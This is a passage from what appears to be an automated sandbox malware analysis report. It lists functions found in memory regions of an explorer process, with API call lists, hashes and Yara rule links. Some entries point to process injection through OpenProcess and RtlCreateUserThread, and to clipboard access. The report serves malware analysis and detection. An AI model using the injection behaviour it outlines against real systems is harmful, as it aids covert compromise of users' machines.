                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0DF0DD00
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0DF0DCDC
                                                                                                                                                                                                                          • Part of subcall function 0DF0E39C: _calloc_impl.LIBCMT ref: 0DF0E3CA
                                                                                                                                                                                                                          • Part of subcall function 0DF0E39C: Sleep.KERNEL32 ref: 0DF0E3E1
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0DF0DD17
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DF0DD2F
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DF0DD7B
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0DF0DD9E
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0DF0DDB0
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0DF0DDC8
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DF0DDD4
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0DF0DDFF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2895548159-0
                                                                                                                                                                                                                        • Opcode ID: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                        • Instruction ID: 4da914b9bc7b79bcf68749bad078a7f1f6e776ab6d245de6503ca2a6cb8597fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86413622B1628141EB21AAAEAD10B3A7F95BB84FC4F04D525DF095BF84EF3CC4019740
                                                                                                                                                                                                                        Function 0B0BDC48 Relevance: 19.6, APIs: 13, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0B0BDCA1
                                                                                                                                                                                                                          • Part of subcall function 0B0C4800: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B0C4820
                                                                                                                                                                                                                          • Part of subcall function 0B0C4800: __crtGetLocaleInfoA_stat.LIBCMT ref: 0B0C483E
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0B0BDCAD
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0B0BDCC9
                                                                                                                                                                                                                        • __crtGetLocaleInfoA.LIBCMT ref: 0B0BDD00
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0B0BDCDC
                                                                                                                                                                                                                          • Part of subcall function 0B0BE39C: _calloc_impl.LIBCMT ref: 0B0BE3CA
                                                                                                                                                                                                                          • Part of subcall function 0B0BE39C: Sleep.KERNEL32 ref: 0B0BE3E1
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0B0BDD17
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B0BDD2F
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B0BDD7B
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0B0BDD9E
                                                                                                                                                                                                                        • _calloc_crt.LIBCMT ref: 0B0BDDB0
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0B0BDDC8
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B0BDDD4
                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32 ref: 0B0BDDFF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2895548159-0
                                                                                                                                                                                                                        • Opcode ID: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                        • Instruction ID: eab91724f2a417881a07b7f239e696f20de7b23bc8820fd158f59b54bb4848b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3141E52271129149EBBDAB66A921FFFA6D1BB85FD4F044A35CE855BB04EF3CC0058705
                                                                                                                                                                                                                        Function 0DFD3E90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: @$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-3701502330
                                                                                                                                                                                                                        • Opcode ID: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                        • Instruction ID: 4d12a1e338386147bbad6be6f1a298d73d58ec1cad12d8d8d741b0cd1d82e7ff
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5419122604B8586EB64DF59F84036A73A6FB85B84F4C8035DF8E43B58DF38C599C715
                                                                                                                                                                                                                        Function 0DEF3E90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: @$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-3701502330
                                                                                                                                                                                                                        • Opcode ID: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                        • Instruction ID: f2376147fb641593da243f6668e23808f6e799a07d8a13ea862717153f1ca809
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84416123304B8686EB20DF55F8403BA63A4FB85B88F489026DF8E57B54DF38C595C715
                                                                                                                                                                                                                        Function 0B0A3E90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: @$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-3701502330
                                                                                                                                                                                                                        • Opcode ID: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                        • Instruction ID: 7473a392a841c6644f2773023ba8a4fbe51e23ed92a2f28545788eb6729e20d8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C241E032304B8186EB68DF95B8407AFB7A1FB85B84F584425DE8D83B58DF78C199C704
                                                                                                                                                                                                                        Function 00B5D57D Relevance: 15.2, APIs: 10, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$Info__crt_calloc_crtfree$UpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3055818068-0
                                                                                                                                                                                                                        • Opcode ID: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                        • Instruction ID: 1bac1c251ee180bc5ea813cf0cc3ff2ad3cc0d0948d4dfc3fafc3b755416cf34
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB51C531728A194BE77DA768585277A33D6FB99716F1043EEEC8AC3245DF28DC074282
                                                                                                                                                                                                                        Function 02BFD57D Relevance: 15.2, APIs: 10, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$Info__crt_calloc_crtfree$UpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3055818068-0
                                                                                                                                                                                                                        • Opcode ID: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                        • Instruction ID: f500cb6cba9651390e2947e6d7838b8ca90c010657288f913d897c5090ddc5bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C51D831728A1A1BD7BDA72C985177A73D7FB89714F1042AEDA8BC3285DF24DC064682
                                                                                                                                                                                                                        Function 0B9AD57D Relevance: 15.2, APIs: 10, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$Info__crt_calloc_crtfree$UpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3055818068-0
                                                                                                                                                                                                                        • Opcode ID: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                        • Instruction ID: 75a16db210289661252c6bf48c41c4d9ec4c5fced62ef4f61259292cc5293121
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B51B631B28A190FD76DA72858167BA73D6FFC9B18F10453ED89BC3685DE28D80246C2
                                                                                                                                                                                                                        Function 0DFE7B50 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        • Opcode ID: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                        • Instruction ID: 603924add0f90a842268b85886bdb500a39b1a4614e50ad2dba2b0e58d9f2f15
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC014B25608A81C2EB04AB62F81836E7361FB89FC1F488535DF4B0B768CF3DC4968794
                                                                                                                                                                                                                        Function 0DF07B50 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        • Opcode ID: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                        • Instruction ID: 97d6c07bf56fb8786337970683118bdb84a83a764bc68309f4842808741aac1f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07012C25608A82C2EA04AB92F81836A7361FB89FC0F459136DF4B07755CF3DD6858768
                                                                                                                                                                                                                        Function 0B0B7B50 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        • Opcode ID: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                        • Instruction ID: 0ac363c7a30753eb575ef1b3cae615114b6d69c5b2d2a2dd2d71a7a387adf970
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29018B75204A4186EB08AF62F81839EB762F788FC0F088931DE5A07724CF3CC4968394
                                                                                                                                                                                                                        Function 0B0B7960 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                        • Instruction ID: 053c03c2c2a717608a06991e8e490b3faa08a7fea9cbce42900afb4cb15e3586
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44018B22715A4582EF499F66B9443AA63A1AB88FC0F085535DE6B07B64DF3CC4958710
                                                                                                                                                                                                                        Function 00B41125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 00B411AD
                                                                                                                                                                                                                          • Part of subcall function 00B5BBE1: _FF_MSGBANNER.LIBCMT ref: 00B5BC11
                                                                                                                                                                                                                          • Part of subcall function 00B5BBE1: _NMSG_WRITE.LIBCMT ref: 00B5BC1B
                                                                                                                                                                                                                          • Part of subcall function 00B5BBE1: _callnewh.LIBCMT ref: 00B5BC4F
                                                                                                                                                                                                                          • Part of subcall function 00B5BBE1: _errno.LIBCMT ref: 00B5BC5A
                                                                                                                                                                                                                          • Part of subcall function 00B5BBE1: _errno.LIBCMT ref: 00B5BC65
                                                                                                                                                                                                                        • free.LIBCMT ref: 00B41544
                                                                                                                                                                                                                        • free.LIBCMT ref: 00B4154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 00B41554
                                                                                                                                                                                                                        • free.LIBCMT ref: 00B4155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                        • Instruction ID: 2141d22ce513b61f02ed9594c022c35b72153e08da03567e7659ec2c63d5af90
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DD12231618B488FDB68EF28D8597AA77E1FB98301F10062EE44BD7251DF78D946CB81
                                                                                                                                                                                                                        Function 02BE1125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 02BE11AD
                                                                                                                                                                                                                          • Part of subcall function 02BFBBE1: _FF_MSGBANNER.LIBCMT ref: 02BFBC11
                                                                                                                                                                                                                          • Part of subcall function 02BFBBE1: _NMSG_WRITE.LIBCMT ref: 02BFBC1B
                                                                                                                                                                                                                          • Part of subcall function 02BFBBE1: _callnewh.LIBCMT ref: 02BFBC4F
                                                                                                                                                                                                                          • Part of subcall function 02BFBBE1: _errno.LIBCMT ref: 02BFBC5A
                                                                                                                                                                                                                          • Part of subcall function 02BFBBE1: _errno.LIBCMT ref: 02BFBC65
                                                                                                                                                                                                                        • free.LIBCMT ref: 02BE1544
                                                                                                                                                                                                                        • free.LIBCMT ref: 02BE154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 02BE1554
                                                                                                                                                                                                                        • free.LIBCMT ref: 02BE155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                        • Instruction ID: 2c5ef5d0f2aba4a1193608b1c2c4a9c8265b21e021b46d8306b6ce7c7e7b95e3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6D12230618B488FDB68EF28D8596AA77E2FB98305F10062ED44FD3250DF78D946CB81
                                                                                                                                                                                                                        Function 0B991125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0B9911AD
                                                                                                                                                                                                                          • Part of subcall function 0B9ABBE1: _FF_MSGBANNER.LIBCMT ref: 0B9ABC11
                                                                                                                                                                                                                          • Part of subcall function 0B9ABBE1: _NMSG_WRITE.LIBCMT ref: 0B9ABC1B
                                                                                                                                                                                                                          • Part of subcall function 0B9ABBE1: _callnewh.LIBCMT ref: 0B9ABC4F
                                                                                                                                                                                                                          • Part of subcall function 0B9ABBE1: _errno.LIBCMT ref: 0B9ABC5A
                                                                                                                                                                                                                          • Part of subcall function 0B9ABBE1: _errno.LIBCMT ref: 0B9ABC65
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B991544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B99154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B991554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B99155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                        • Instruction ID: a91bc7e44e314e8bc3991848c7c0ba73bb2909e55462a0ec4546828574d6fdef
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e01e40e22fb61bae9aaf0c1c0962422725e10e00a5bb5afd3c3a191dcfa7dea3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3D12330618B488FDB68EF28E8596AE77E5FB98305F10062ED44BD7250DF74D946CB81
                                                                                                                                                                                                                        Function 00B6F345 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                        • Instruction ID: 2b68b9fdbc767b550f96e36203f4f5f85f23606519028684970a1ec8606e5034
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 433fd11cc7a8e3897c0cfcee7af86f806a51f7959c741a156b69d414921e067b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0E13376A002178BCB24CF98D880ABAB7F1FF58314F2941B9D905AB356D739ED51CB90
                                                                                                                                                                                                                        Function 02C0F345 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
